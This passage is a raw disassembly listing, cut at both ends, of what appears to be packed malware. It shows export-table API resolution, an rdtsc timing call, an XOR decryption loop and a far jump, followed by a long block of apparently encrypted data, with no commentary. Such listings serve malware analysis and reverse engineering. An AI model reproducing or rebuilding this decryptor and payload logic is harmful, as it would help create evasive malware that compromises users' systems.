sub_31442015+143j loop loc_3144214F pop ecx jmp short loc_31442190 ; --------------------------------------------------------------------------- loc_31442168: ; CODE XREF: sub_31442015+14Cj sub [esp+0Ch+var_C], ecx mov esi, [edx+24h] pop ecx add esi, ebx movzx eax, word ptr [esi+ecx*2] mov edi, [edx+1Ch] add edi, ebx mov esi, [edi+eax*4] add esi, ebx lea eax, [ebp+10113Fh] mov dx, [eax-17h] call sub_314421C3 jmp short loc_314421D8 ; --------------------------------------------------------------------------- loc_31442190: ; CODE XREF: sub_31442015+100j ; sub_31442015+107j ... mov eax, [ebp+103984h] and eax, 10000000h jz short loc_314421BC mov edi, [esp+8+var_4] lea esi, [ebp+103988h] lodsd mov ebx, [ebp+1042CCh] stosd movsb mov edi, [ebp+1042D4h] mov esi, [ebp+1042D0h] loc_314421BC: ; CODE XREF: sub_31442015+186j pop ebp retn ; END OF FUNCTION CHUNK FOR sub_31442015 ; =============== S U B R O U T I N E ======================================= sub_314421BE proc near ; CODE XREF: sub_31442015+F2p ; sub_31442015+F9p rdtsc retn sub_314421BE endp ; --------------------------------------------------------------------------- db 2, 8Bh ; =============== S U B R O U T I N E ======================================= sub_314421C3 proc near ; CODE XREF: sub_31442015+174p push ebx mov ecx, 2845h mov ebx, edx loc_314421CB: ; CODE XREF: sub_314421C3+11j xor [eax], dl sub dl, bl xchg bl, bh inc eax xchg dl, dh loop loc_314421CB pop ebx retn sub_314421C3 endp ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_31442015 loc_314421D8: ; CODE XREF: sub_31442015+179j jmp far ptr 9036h:0FE000087h ; END OF FUNCTION CHUNK FOR sub_31442015 ; --------------------------------------------------------------------------- test [ecx-674A4FC6h], ecx sub eax, 60F2DB98h movd dword ptr [edi-68h], mm4 retf 0FAACh ; --------------------------------------------------------------------------- db 7, 0, 71h dd 25E4F1E6h, 2481BE90h, 5FAA80BBh, 2499DBB4h, 87026685h dd 0E8EEA957h, 0E2C185CEh, 0A98F57CAh, 0C5A50DB2h, 0D2B26EB6h dd 0D9BC67D1h, 0F1312945h, 5EA4D798h, 48B3105Ah, 3D6C38AEh dd 0E357FC2Eh, 935BC159h, 0F0B0458Ch, 5F93A51Bh, 0C4984C1Bh dd 0BBA38416h, 0ED912382h, 4E39F29Ah, 9288E7C8h, 4691D60Bh dd 0D0054482h, 0C17CA56Bh, 84DD1C7Dh, 0FE749963h, 0FDF0D6F1h dd 516C5D7Eh, 0AC7DC3CFh, 3E73166h, 90700EEAh, 0FF9A525Eh dd 6448FD86h, 7CE15057h, 0B550D36Ch, 325951FBh, 8181A44Ah dd 0E67ABFFBh, 860DA42h, 0CA3C56B3h, 0CAADC065h, 5F343908h dd 0C3F0CDAh, 722CFDFAh, 363CA0A1h, 2EE7D266h, 3820AB22h dd 242A2097h, 0E8708F0Ah, 84147964h, 6E859C12h, 470C5D30h dd 428C38CAh, 1042104h, 9000BE8Fh, 8577F5EEh, 54F46443h dd 3E1948F6h, 0A5F0A3E2h, 2FEC17Bh, 34D74EAh, 0C608F204h dd 0D88AA769h, 378585EDh, 0B4C36A4Fh, 57FEAD6h, 68878A2Eh dd 35D0AA30h, 4DC8D4A2h, 513EC6h, 0A3C0BBFCh, 0CA39B57Ah dd 0F627FBB5h, 0B42369B6h, 0A0B139B2h, 32AC39AEh, 9DA827C2h dd 0B031EEA6h, 0F5A0EB9Ch, 0D818EA5Eh, 2E98CF98h, 2EFCE996h dd 7290A792h, 0E644C8Eh, 0BC891DDDh, 0D78460EEh, 0F615B482h dd 0C27C2540h, 94791F70h, 40429C89h, 6D98F362h, 0BB6CDD6Eh dd 3C68C53Bh, 0C53DB10Ch, 0EF6AF168h, 0EA622FCBh, 27A9845Ah dd 0F002E4D5h, 0B7504342h, 0A24E19CAh, 8C4EFF4Ah, 220A0146h dd 600CA706h, 744E40C1h, 81B5BF2Ah, 1E24BEE0h, 0B5BD5A01h dd 0F23C4390h, 34BB699Bh, 0C6245353h, 8ED286A1h, 951C250Eh dd 841A0F9Eh, 0AC917216h, 0A710F32Ch, 0C783CC7Eh, 2C188FD1h dd 28DE248Dh, 70FF8B12h, 0C279FAFFh, 5FF84FC3h, 0AECA8F73h dd 0A980CCF2h, 0ABC39861h, 0F16307FAh, 66F4CF2Ch, 211FC101h dd 6594ADFh, 0AFD8BFE3h, 1EEA4B5Bh, 7D960D2h, 67436CBFh dd 0CCD86E83h, 0B6C5F92Eh, 0E87DA6C2h, 1BC0581h, 82B89575h dd 5AC4166Fh, 22B33231h, 6555BEEEh, 4C2A7C0h, 1347242Bh dd 0E9197BB2h, 579C659Eh, 3B66029Eh, 5F2C669h, 98DD271Fh dd 0E48C0D8Eh, 68CF7A21h, 0DB60D32Dh, 50BD3F17h, 0A31A197Eh dd 97D3F978h, 0B968BB4h, 0E81AA7F9h, 0D21EB106h, 0D6A4CC6Ah dd 0CCA0BA66h, 90607362h, 3A360D5Eh, 6A32BD0Bh, 80C12606h dd 6050D36Ch, 4A0C69CDh, 0C48E5A6h, 0F62E55CDh, 0A02AA7C9h dd 0C8565554h, 0DC385568h, 9E345BDAh, 0E2611358h, 0E7D3ADD1h dd 5C38D9FCh, 0B9A18879h, 31273F2Dh, 0AF91A51Eh, 4089F1Ah dd 0EE18C2AFh, 2BFFE812h, 0C2E1CCABh, 2108271Ah, 86106383h dd 0D0E0F402h, 0DC9FAAh, 8A6D2005h, 0BBF4D9C8h, 1C85EC32h dd 12EDD206h, 0FCF96FEAh, 83B771E6h, 0A5823EA6h, 0D3AE15B9h dd 0C1B446ACh, 0D9D47CB1h, 78D5533Ah, 2E7912CEh, 0B3C8C788h dd 26FAA353h, 0B53FFCC2h, 0AACAB98h, 0F6D27FD0h, 0E0E2FC49h dd 0E00953A2h, 25AC3DAFh, 9021C681h, 79F34582h, 609E6137h dd 0D96AD69Eh, 54A7F93Fh, 79C0B996h, 260E366Dh, 0C2098D9Eh dd 6FCE11FEh, 38F66578h, 0C8A43F7Dh, 80163514h, 0AAEE8A85h dd 0BEF10966h, 80E32F06h, 526CD8E6h, 0DFF90E59h, 10E1885Ch dd 65608B5Dh, 0DE20046Ch, 962B0C7Eh, 4F7C2D25h, 0B85EE493h dd 0F2187D4Eh, 0DC18461Ch, 38D1FE15h, 0E540FB7Ch, 45488CFEh dd 3C1CCBC5h, 21022CB9h, 0CDD89322h, 0A1D382D3h, 0E20EF2D5h dd 48CF5136h, 0B108FFA3h, 654B251Eh, 9426298Fh, 48810616h dd 0B110F32Ch, 0BDF336CEh, 2C62ED0Ah, 166EA16Ch, 1688B68h dd 61FC71FEh, 84F8353Eh, 7A7F459Ch, 0D0A6D10Dh, 92EC29B1h dd 0A600CED9h, 0EB1B0E19h, 40F58A77h, 6B8D97DEh, 0E4D508Ah dd 8DD489E8h, 7313A316h, 0BA943531h, 0CCFABBCAh, 0B6CA2AC6h dd 0A0C02AC2h, 8ABC15BEh, 74B8FFBAh, 5E9D6DB6h, 48B0D3B2h dd 61FAECAEh, 229A3255h, 5F0F91B6h, 8560FF0Eh, 19728765h dd 0DDE5DA17h, 51C63986h, 88AEA907h, 0CE09848Eh, 8488E7C8h dd 5684E190h, 2BEFA4CEh, 582CC50Bh, 7811E913h, 0A811EE13h dd 8D051F13h, 2D3C5D2Fh, 0AC5675FFh, 0F6E1B866h, 53600B20h dd 93D4702h, 939A13Fh, 2C1BBD33h, 4C33A638h, 561AF13Dh dd 782BF219h, 8237ED46h, 8E250730h, 0AF4E163Eh, 0F25D4B5Bh dd 0DF51455Fh, 0ED425032h, 3449894Fh, 114D8B43h, 2F54A147h dd 3061DC4Ch, 7B79D75Dh, 7648EA6Eh, 9D711A79h, 9B102261h dd 0B66D287Ch, 0C16D656Fh, 0C2615569h, 0E165796Ah, 18BFF59Ah dd 318CBE9Fh, 5B86A1A2h, 6BF0D793h, 668DF89Ch, 9387D38Fh dd 8A81198Ah, 83D26892h, 0C9AC24B0h, 0A4AC40B2h, 0FABD6193h dd 1DA26B86h, 24CC89AFh, 18ADBBA3h, 62A1ACAFh, 53B9F8ADh dd 5ED1F0CAh, 0F4DD12D3h, 0BBD11BF0h, 0BAD23AFEh, 0B2D54FCFh dd 0DADC42EDh, 0C7C17DCFh, 19D28FD6h, 3FE890FCh, 3988EE9h dd 47D2CDF3h, 71C3C6FEh, 458CE8F4h, 85CE03EFh, 0BFD004EAh dd 87802EEFh, 0C531411Bh, 0F1146A1Eh, 1A1A683Eh, 6831961Eh dd 618B829h, 7A18AA0Fh, 6801DD0Fh, 5105F603h, 8E39C25Eh dd 94350A0Eh, 0A6203806h, 0DD174313h, 0D0297B3Ah, 0E2277E39h dd 2214646h, 13328E14h, 0F52BA57h, 7338FE42h, 7162DD53h dd 6D5DE65Eh, 9D4A1367h, 0A8490A58h, 874A3E4Fh, 0D14F7722h dd 0F875697Ah, 0FD6A6E68h, 0F59F957h, 3D79B562h, 46A8279h dd 2C6DDB63h, 7861D149h, 656CE244h, 9A8C14B3h, 959F3193h dd 0DB8406F6h, 0C782639Ch, 0E19F788Dh, 139A57EAh, 15979485h dd 39A6E9D1h, 3AA8B6ACh, 47B7DD8Ah, 3DA7EAB3h, 80B5CDE0h dd 879F6DBAh, 0A0A111BEh, 0C2B000A3h, 0D5A242B0h, 0CBCF70CAh dd 0DDACBAh, 3BD880F0h, 2DDDBAE6h, 57C0EEAEh, 4FA8D7CFh dd 63D0E2DFh, 9DC92FCFh, 9CF331FBh, 90FD23F3h, 0AEF154FFh dd 0F9FD4DC7h, 0E7E55BFEh, 2AEEB8FDh, 56E18DEFh, 34F2A2D4h dd 6B10D40Bh, 7717F316h, 9706DE76h, 81361606h, 9C6C3802h dd 0D60C061Eh, 0F6104213h, 0F9167210h, 1F3B6032h, 0F37BB29h dd 54B733h, 5D228026h, 6429D92Fh, 0C2DFB23h, 8407F508h dd 85340A27h, 0A953276Eh, 0B44B4C5Fh, 0EC775D78h, 0ED447257h dd 11438F7Eh, 195B944Fh, 326AD15Eh, 5145C961h, 7F4FC06Ah dd 6B71FB79h, 9A5A7978h, 0B9751151h, 0B159287Ah, 0DE58456Fh dd 0E5614269h, 0F44E0B71h, 3C8C94B3h, 1B8FBA93h, 5D919A90h dd 469FDA86h, 5D98D3EEh, 0BA86E29Ah, 0E6811D8Fh, 0A0AF2FACh dd 0C88C2BBBh, 0D7BD4CB5h, 0E5BB4DA5h, 36D06DB7h, 7BCA2BAh dd 2FAD84A4h, 58ABA8B2h, 70B4E5C2h, 6FC8FACCh, 9DEE0BD9h dd 0BFC11DC4h, 0A5D51EDEh, 0B2D54FC1h, 0E9F953E4h, 0CFDD63C3h dd 2CF9DCCh, 33E884F3h, 2BCCA1F5h, 2EFADCFDh, 6AC7D7DCh dd 54E9F9E7h, 99FC05E3h, 0B3C90DE7h, 0B9F224EFh, 0C608677Eh dd 0F711712Fh, 2D116D19h, 6198106h, 13038909h, 6F01B404h dd 480DC312h, 43379B05h, 9B28D61Fh, 942D1B28h, 0A1383A56h dd 0D7232621h, 0D629462Dh, 0E227744Ah, 2276428h, 14258C42h dd 3E4FBA56h, 5556C658h, 6C34CC5Bh, 846F057h, 9642185Dh dd 0BF47142Ah, 0C650344Dh, 0D554556Bh, 0EE794B6Ch, 0F7776359h dd 75B173h, 58758F76h, 2778A347h, 586DD978h, 5570C441h dd 656EE56Dh, 8E99019Dh, 0A0992BA9h, 0D0BD4993h, 0C6825686h dd 0E2A3698Bh, 7CA9698Fh dd 3909FAFh, 2485B590h, 54B9B591h, 65B4DD8Fh, 7ABAD0D6h dd 9DBEF1B7h, 83A93FBAh, 0A0A111AEh, 0F28541A3h, 0E9906A94h dd 0CE92278Dh, 26B8B3F6h, 32F78ED3h, 3D5A0DDh, 60ACC4CBh dd 6CE7C0CFh, 63EFFFC3h, 0B1D83EDBh, 0BDF9379Eh, 0B6FD3ACBh dd 0C2F56FEFh, 0E0D546E7h, 0E7DE0DCFh, 18EDA4EDh, 23E880D0h dd 1F88EE7h, 0DC4FE37Eh, 422E9D10h, 0FF1E5DFDh, 0F0028C20h dd 82F9A238h, 37685728h, 0F03267A2h, 0E09F4D32h, 0C4C9FA46h dd 0E758FF64h, 8C0AC992h, 71DDC35Ah, 738486B5h, 0C489722h dd 0D2080CAEh, 8A400141h, 996C043Bh, 78B33A50h, 0CEE0A266h dd 0D9707966h, 0E7D3AE7Ch, 5C38D9CCh, 0B92815A5h, 201E55B7h dd 12D8261Eh, 0F08D02D9h, 0DD14692Bh, 8A1009DBh, 0F00C7D66h dd 0FDCCBC0Ah, 0C6444B57h, 3186153h, 0A8FD3Eh, 0C1078FF4h dd 3EE4F714h, 1BD07771h, 1D2C183Ch, 261F4573h, 252652BEh dd 381F68B5h, 4523BA1Fh, 0A47DABD5h, 0E68419D6h, 78D0713Eh dd 62A63945h, 0CA21B41h, 26C4C1AEh, 72C2C1C2h, 0E6D495D4h dd 9EB87FC8h, 8EE738B6h, 0F666C64Dh, 0EBF33DBEh, 0A28EB255h dd 792111B6h, 0FD2B8AD6h, 5A8CF016h, 0D115C379h, 2E84A996h dd 4BC77291h, 87075F71h, 0EC984948h, 0FE5EEE0Bh, 0EB684B82h dd 2183CA81h, 8446C5FFh, 59FB8476h, 8070F35Bh, 0AD932274h dd 2AE42E1h, 0A9E9B176h, 1060B24Ch, 5A38CB6h, 2EDDE4A5h dd 4B544968h, 35703792h, 0A26516C1h, 72BCFF4Ah, 0F3CFFEB9h dd 6050D590h, 414815BBh, 1D7030B7h, 0C1DCA936h, 83CF6CCCh dd 0A7EF22E9h, 0DC2867C2h, 2BA50C26h, 0B030203Eh, 1F91EC2Dh dd 840811BDh, 3F45AD47h, 0A741B242h, 52329F9Bh, 80C300Ah dd 282234F9h, 0C25D8B12h, 2A975FAh, 0D4F85FFAh, 0F519C8ABh dd 0C2F023E9h, 84799011h, 2CE817F1h, 42C43CB4h, 0D3E0F1E2h dd 0FDBAC91Ah, 34C3F35Fh, 0C9F454D6h, 0E8CBDD57h, 0C8CC49CEh dd 0A60B0ACAh, 0BF2C19DCh, 2DC02BC2h, 741674FCh, 0B7488A73h dd 61F47CDFh, 0CCB5D3A2h, 0BBEEB5A6h, 0C97E73Fh, 0C54666A6h dd 0F0A093F7h, 5BC1659Eh, 0D483EA77h, 0EA09B296h, 1B9033ADh dd 828429F2h, 6C317385h, 0BA05E186h, 4080C98Ah, 2B78DD2Ah dd 81879F7Ah, 0FE64B70Ch, 6CFD8FF9h, 0D26D594Ah, 0BC02176Ah dd 0A664358Eh, 0C2324D62h, 0EFA3525Eh, 6448D12Ch, 0D9D91065h dd 3850C256h, 2026FC1Fh, 6449FD1Bh, 0B6448146h, 0A2D59410h dd 5C3C4500h, 0EF4CC9BFh, 9A5C7D66h, 0DF301333h, 520849D1h dd 0A328E728h, 561BF3B3h, 0F0A5E222h, 0EFFB36Ah, 6ECC044Ah dd 0B9452B16h, 62859C44h, 9B0C5D30h, 7C7DF78Fh, 0B091DE50h dd 0D001B3Ch, 3DAEB1A9h, 0D9A09B90h, 3EF5CD61h, 0E8C318F2h dd 0E1B58D84h, 0ACB8D741h, 0B6B421B6h, 9A75A4B0h, 3BDC55E0h dd 0A4DA271Eh, 0AAA0E6D6h, 6A45FCDAh, 31CCFDF1h, 73DA4235h dd 0F499C1D6h, 1E40ABC6h, 4CBDE0B4h, 0E13CF231h, 0C75769A6h dd 0D8B0C63Fh, 63AF3DBEh, 187AD8FCh, 992C1E66h, 7FA0FBA3h dd 5A9DF51Ah, 7EA64F9Ah, 0AED2A9E3h, 9C9FA3ACh, 28C8C8Fh dd 99A8490Ah, 0E8052777h, 87CE02D2h, 65F7770Bh, 0DB7959BCh dd 1425C75Dh, 3B26A272h, 6D664891h, 731C77Ah, 0F9E1BEA7h dd 9D609B62h, 0EA421EDBh, 8C58055Ah, 0CE54595Ah, 2DAF1002h dd 0A25C1244h, 8C481B77h, 0C9C10E46h, 8940EB42h, 4A3CD58Fh dd 666881BBh, 9B3BFF7Fh, 8309397h, 5E24BBADh, 58276A16h dd 0C62451BFh, 43551B1Eh, 952619B2h, 8418839Fh, 4E195416h dd 6530C332h, 3669AA2Fh, 10A4C87Fh, 9778D426h, 6820747Ch dd 9B89018Ah, 0A4FB217Bh, 0CBDB66CCh, 57B7F59Ah, 28DD12EEh dd 7CE820FAh, 99B61311h, 40DE7177h, 6A1CF6DEh, 0CC88FF8Ah dd 0ED499DFh, 96A7EC96h, 86AD02A2h, 0D65DA8CAh, 33C451F9h dd 93F65F02h, 0CE399C77h, 25B8EF85h, 5EB6E9DEh, 1EE18232h dd 2C3942FEh, 91A8B795h, 16BF0E33h, 39932BA2h, 88CC34CAh dd 51671ECBh, 0AE8407C4h, 67B42715h, 92B22B1Bh, 0EC4B0F8Ah dd 4691960Bh, 8379CA82h, 2B16B414h, 6787AC85h, 7B617672h dd 0DB2A07B2h, 61BCD6B5h, 80384461h, 0BBA784EBh, 2AEB1B72h dd 7A5C0452h, 655065D1h, 0B657D956h, 0B3300879h, 43EA5E85h dd 0EE0F923Eh, 756A6AB3h, 6B136485h, 1EB702F2h, 0F4526B6Ah dd 615E7B67h, 0B6D686CDh, 0FFA7FD3Eh, 5C38D970h, 6D2815A5h dd 37C938EDh, 1A76A2D9h, 4B918FF2h, 0A147BA15h, 99473754h dd 8F50085Ch, 0C37A5463h, 0E2624E75h, 0EE695C5Eh, 198B9A9Ah dd 268D9CA6h, 4A9AAC84h, 5B82D6A4h, 4E82F287h, 9098FFAFh dd 94810389h, 0A2810FE2h, 0F2A820B9h, 0A4AC5CB5h, 0DED419D4h dd 0A85F7187h, 1AA39FBEh, 25E6BAA3h, 57A3A2B4h, 59B8CAAEh dd 0AD0E590h, 0BFFB36F4h, 0B2D90196h, 0B0DC3ADAh, 0E1F937C7h dd 0FD8875EFh, 0C8ED5EECh, 19D6DD82h, 50E991ECh, 449827CFh dd 0AFC9B996h, 88E0E7Fh, 75094B8Eh, 0EC88679Fh, 0E8FAF479h dd 28414B92h, 0C0404161h, 0A2CD9464h, 27741948h, 1D5ECFDEh dd 6CEDBB44h, 1F1DDA95h, 195E0CEBh, 66EB9B72h, 9CF9D25Ch dd 54DDE2FFh, 4154496Eh, 0A86895D7h, 0E4C5D74Eh, 72069BB0h dd 9445B0BDh, 8810008Dh, 0B5C32E1Fh, 3C1CC3B9h, 0F670DC32h dd 830933Ah, 0DC6F3B7Dh, 0DC642B6Eh, 0F8AEC4D9h, 702B3B32h dd 0F08F286Ah, 11E75C18h, 6E04C724h, 0B08333EDh, 0BDF33399h dd 2C08BCE2h, 5542F206h, 2E53C45Dh, 0EAB039BAh, 0EA72CA05h dd 0C21C49E6h, 400FCC0Ch, 6D13EBEEh, 6E348A15h, 0AFD7F1F6h dd 12085E6Fh, 6B8DC5CEh, 7588FE8Bh, 9B2BC887h, 0F8C0BD54h dd 0E2CC6626h, 899B02CAh, 98F67294h, 0A08C6786h, 0B4368041h dd 7E50FFAAh, 29B4E9B6h, 21C2A3C1h, 73CAC9C0h, 8957F7AAh dd 6B4AF94h, 0CE9AFE2Bh, 0EB93658Eh, 0DDE5C217h, 2B1D3986h dd 98801CD2h, 819F2DFh, 0FF88E7B4h, 5684E5EEh, 0CA354682h dd 737CA567h, 2B5E22F7h, 3C9C8966h, 8E8F8C87h, 0CC01D8A9h dd 0EC68477Ah, 0B80B94E5h, 1D601B72h, 6A4228CBh, 0E0CBF5Ah dd 1C54B357h, 3850C13Ah, 8D952CEh, 89488775h, 0D431DB86h dd 0FE20E6CFh, 0A06E552Eh, 0D98DB23Ch, 0CA343928h, 0D9604364h dd 5CB9027Ch, 428F715h, 790244D9h, 0B5E6BB32h, 1A0CE459h dd 414671Ah, 0BD437916h, 0EB5B205Dh, 8E48633Ch, 39F73746h dd 96141F8Ch, 80076391h, 0DF71F5FEh, 54E8C71Bh, 0C84944AFh dd 0C0F0A3CCh, 0ED1368D3h, 0FCE88B02h, 0A8AD26E6h, 84A515ABh dd 0F69001F0h, 2E4DD0DAh, 0BD409E8h, 4D540C12h, 0F1CCEDCCh dd 4CC8D2A2h, 29714CC6h, 79C0BBDBh, 35AE2833h, 0F2507FAAh dd 5D4B9643h, 0D88F450Fh, 36A33DAEh, 9CA825BAh, 8734FD27h dd 18F4FBA2h, 5A9CE49Fh, 7A6E5A65h, 0EA15B986h, 1890A202h dd 685806DEh, 7977258Ah, 0D6945E90h, 0B5D98B07h, 0B9F45D73h dd 1871F7Ah, 7E6437DCh, 0D5F31199h, 527CC301h, 0B141B26Ah dd 367AC2E3h, 859FCB62h, 0FA4CBA5Ch, 6057AFDFh, 0CE5458DFh dd 335C03D9h, 2D7CD24Eh, 9C5678CFh, 31C1C746h, 6140FB03h dd 4B56D554h, 0A1C7BD50h, 1E249638h, 7CF6BB1h, 0F22D1DAAh dd 49A5F42Ah, 0C6344F4Dh, 0E3722B48h, 0A4E2B0E1h, 449D0F0Ah dd 6F547C19h, 0E59DE312h, 421CD382h, 10E0BFBBh, 7EFB5EFCh dd 8B96h, 631A5EA0h, 2BAC7BCEh, 0AECACB63h, 324DBEF2h dd 23EC0DF0h, 86F5EFEBh dd 0F3690E19h, 50F0C565h, 2EB4C5B4h, 76D8AFDAh, 4416685h dd 75D093EDh, 6FD8498Ah, 0DC8ABF5Fh, 0CB11C6h, 8484A0C8h dd 825CD4AAh, 66B9B5B8h, 14A6EBFCh, 6CF4D8B1h, 3D4D3DA6h dd 4DA0476Bh, 1680D5ADh, 7DF0495Dh, 0CAA32D23h, 0C484A79Ah dd 80B13996h, 0B6B05BA4h, 0B8AC23AEh, 42ADD2AFh, 2EA199BEh dd 4AF3EEA2h, 6435FA34h, 0EB2F9F5Ah, 0EE4AB3E3h, 44B4F272h dd 0B86C5D6Eh, 0EF3F176Ah, 996EA499h, 1DEB1B72h, 7A4C10CEh dd 7FBBEF30h, 1F59103Dh, 3850C6BAh, 46698B4Eh, 0F31F9740h dd 0E67ABBD3h, 0EC84E842h, 0A237BE6Eh, 0B4383F3Dh, 809494BBh dd 0DB671322h, 4D2668D1h, 9CADE73Ah, 0F3A98558h, 3030846Ah dd 0F8C009Dh, 89188F0Ah, 0FE553E9Bh, 0B2DE4812h, 915A1C0Eh dd 930EA2F5h, 6E872116h, 112F7502h, 0DF710B75h, 54E8E0B2h dd 9006C446h, 0C090A387h, 0ED1367C4h, 1FFFF58Bh, 0E793FCEFh dd 1F6BB109h, 7518BF5h, 0A4C81092h, 7953BD25h, 8783BA39h dd 72F2175Bh, 3B7557CAh, 37C4D1D3h, 10A881B6h, 0F5BC95CBh dd 0E486D52Fh, 9909E9B6h, 0C8B043F3h, 376B2CDAh, 9CB839C5h dd 86A411A6h, 31E77E64h, 0B39CE58Eh, 0BB673192h, 3B143C51h dd 1890A382h, 0C0D10D8Eh, 0E685778Eh, 0B9EA41C9h, 0AFA025EDh dd 0C3101518h, 0B4597A1Ch, 17002939h, 1C50961Fh, 370FFD01h dd 4E0AA206h, 701C507h, 3040916Fh, 0B57CA57Eh, 892D1C7Ah dd 0EE263C3Bh, 0DC222235h, 0AF6D432Bh, 0E02D4540h, 1A306F23h dd 0C339827h, 2B54F547h, 1441CF4Ah, 3E50C757h, 6D40EB57h dd 9C4D094Dh, 0AF084B5Eh, 0A24A3052h, 8A47554Bh, 9011083Eh dd 0E76C6E4Dh, 97A907Eh, 347C8232h, 3B6DA92Eh, 4866D62Ah dd 716DCF26h, 202CFF6Ah, 0CA8E1A98h, 0B1912D9Ch, 9E872D98h dd 0C98713BBh, 9FD66987h, 198050E0h, 7C49494h, 29C0BE90h dd 1AF0B0B1h, 41B1DDBCh, 31A7FDB8h, 95BFC0F2h, 0ABEC4CABh dd 0BFA177BEh, 0DBAD35E6h, 0E9E00AA7h, 0AACF32CAh, 11CC9ED6h dd 0FC154197h, 1DB566FEh, 94B894C6h, 725127BAh, 9F09D6C6h dd 56B468C0h, 8615828Eh, 0A85413E2h, 45BA254h, 6FC5AA6Dh dd 0B96CB573h, 0D43BA508h, 5684E15Eh, 4080CB82h, 2A7CB57Eh dd 14789F7Ah, 0FE748976h, 0E8707372h, 0D26C5D6Eh, 0BC68476Ah dd 0A6643166h, 90601B62h, 7A5C055Eh, 6458EF5Ah, 4E54D956h dd 3850C352h, 224CAD4Eh, 0C48974Ah, 0F6448146h, 0E0406B42h dd 0CA3C553Eh, 0B4383F3Ah, 3BB74936h, 8820518Ah, 0CE897E2Eh dd 5C28F768h, 52676629h, 3F38E8AFh, 191AEEA9h, 205C04CAh dd 0E2565232h, 9A2B7A60h, 49183E06h, 0EE232348h, 2E91A80Ah dd 9001B40h, 7ABE497Bh, 0D7FD34FAh, 0E716E134h, 28F47193h dd 36B31866h, 980087FAh, 8EE471E6h, 0D0E05BC2h, 9950C053h dd 9D812FCAh, 0DD86DCEh, 8F320712h, 20586831h, 0BB0BD7DAh dd 6949C21Fh, 0C3C0BBE6h, 0F6CC6AAEh, 1C3B7F35h, 57428BB2h dd 0D893DF2Fh, 0B296BEAEh, 0AE8322DEh, 0BB463A5h, 2BF807ECh dd 5AA666C0h, 7667CBEEh, 5C6BBA7Dh, 0E7C74B82h, 0CCA77271h dd 0AE34FAA1h, 0D5DC6196h, 4F437FC9h, 0BA3EADFBh, 0FDD87Ah dd 7E741934h, 8070F372h, 526CDD52h, 7EFC42E1h, 8F8CB176h dd 0F89F6494h, 0FA5C8546h, 0A6CCD2D9h, 0BB545946h, 0B0CDCA5Ah dd 494C3D6Ah, 18C5E8D6h, 0B5441104h, 22D86ECDh, 0DFB5D52Eh dd 3428FDAEh, 1E34AADEh, 0CBF9A032h, 0F2ACEEA5h, 347A672Ah dd 39DBAFCBh, 0F29CAE21h, 4C1F250Eh, 84147599h, 6F137D19h dd 2293E312h, 0C603CD1Eh, 2C08B7F7h, 4608E38Dh, 0FFFE43EAh dd 56797601h, 0D7F84FB8h, 0B67E1930h, 0DCF0CA72h, 0BC159DF7h dd 97A8049Eh, 67AC7A17h, 8F3F3A63h, 0C35D1A01h, 2494E39Eh dd 258D75A3h, 229001Ah, 0E27BE2C1h, 4DAE57CAh, 84F7BFBEh dd 0A06BAECDh, 9EA15BEh, 71CDFF80h, 0B5A4A33Dh, 4BBA58B0h dd 4044EC5Fh, 1F575854h, 16E62D13h, 3025D6A2h, 5E939EE6h dd 0C4984F1Eh, 0EC288C69h, 70C02382h, 7D73F3DBh, 2E347289h dd 0D30BE196h, 4090893Eh, 7958B17Dh, 277A5FF9h, 0F6C286ADh dd 21F06191h, 0F6AD0E4Eh, 0A041434Eh, 82681842h, 798B5B39h dd 0AD53FEDFh, 5A2C32E1h, 0BFC22D7h, 0E24183Ch, 191556CFh dd 223C68EBh, 0D4927AC7h, 0C634C7F7h, 23AFAEBFh, 0AA4CCC62h dd 7749D2B7h, 9E44E06Ah, 4D6A06AFh, 525C060Fh, 79142AA7h dd 36545A07h, 588430E1h, 0ED438F0Ah, 11EB8667h, 0CCD2E04Ch dd 3DF2A2E7h, 0C60AF4F5h, 0DFEC7902h, 8FFF4F7h, 7ADACC6Bh dd 6540B9FAh, 0FE16CBEEh, 0CAF2B016h, 14863688h, 9C66FB2h dd 24678E19h, 0BA31DCEAh, 9B341DDBh, 2427D02Fh, 85A71A2Ch dd 0FDD25362h, 62DCCBF7h, 26EF3C60h, 0B66E99AEh, 38B5A838h dd 0B54840Eh, 4C47804Fh, 0DEB469B7h, 0C5C48136h, 7852DD7Fh dd 9943D141h, 86A4111Eh, 0CF425022h, 0CA09685Dh, 6F98DFA3h dd 0ED4E4E41h, 21142665h, 28C8D9Eh, 79877F8Ah, 0DD64A046h dd 0F902CE74h, 0DF7D356Eh, 1D75797Ch, 8867E253h, 784971F7h dd 5419DF6Eh, 1959CA0Ch, 2B02B58Dh, 0BB06BE63h, 5A339B6h dd 0D01BE4A5h, 8CF8CCDFh, 7BFB4342h, 9BC8A8B9h, 8C48175Ah dd 0E34B0946h, 0CAFCEF82h, 0B5C349D6h, 84AD36C5h, 0E834B974h dd 180911B7h, 0F6597C2Eh, 0DEC35625h, 58F910Dh, 89A4BED5h dd 9A1C250Eh, 0A36C071Ah, 576A7C9Ch, 0B8D1E302h, 0C901AB05h dd 9CA3D14Fh, 938E0BFEh, 10B27Ch, 0EFE7953Fh, 0D2713B9Dh dd 0D8347A5Dh, 10E2D859h, 92E9928Ah, 26D8D41h, 62E4E1DFh dd 48001ABAh, 0BF1A0675h, 24C8884Eh, 0BEF172DFh, 9EF0682Eh dd 84CC8676h, 0A6D1BC61h, 0BF2C19C2h, 2D3FD436h, 6A7DC7BAh dd 0FDBD99B2h, 0B51F8F76h, 0E22063B1h, 0DAF49CC4h, 0E357545Ah dd 21301426h, 70A67BB2h, 0F5EF6D64h, 7EC9D1Eh, 6DE0F368h dd 5FE4E96Ch, 5BF8C770h, 60FC3D74h, 59F02B78h, 4FF4017Ch dd 0E1974CCEh, 0A4D218CAh, 4EB062ADh, 58B09887h, 11D0B696h dd 85ECC29Dh, 86643176h, 16D01B62h, 7E58072Bh, 0EEA6A0D7h dd 5E6DA5F3h, 0B8FBA552h, 2539A8B2h, 43C897FAh, 1EEEC1B9h dd 1FBF9420h, 0F3B8D0C9h, 0F4383F2Ah, 26522936h, 8A452254h dd 0D94AD49Ah, 0D922FF9Ah, 4634E858h, 9A235BE2h, 0E5E398F6h dd 0F3903FE5h, 0FE2DFD93h, 0D8906312h, 720E380Eh, 0D0ADBD8Ch dd 0F004313Fh, 85FC8BA9h, 6A4CF28Bh, 1407907Ah, 83790A5Ch dd 28E08A62h, 0ED139006h, 786D7015h, 0E6E461DFh, 0A4F05BE2h dd 10BCF5DDh, 9D5CAA2Dh, 8ED419C6h, 7FA40BD2h, 8E47B876h dd 0BB877CCAh, 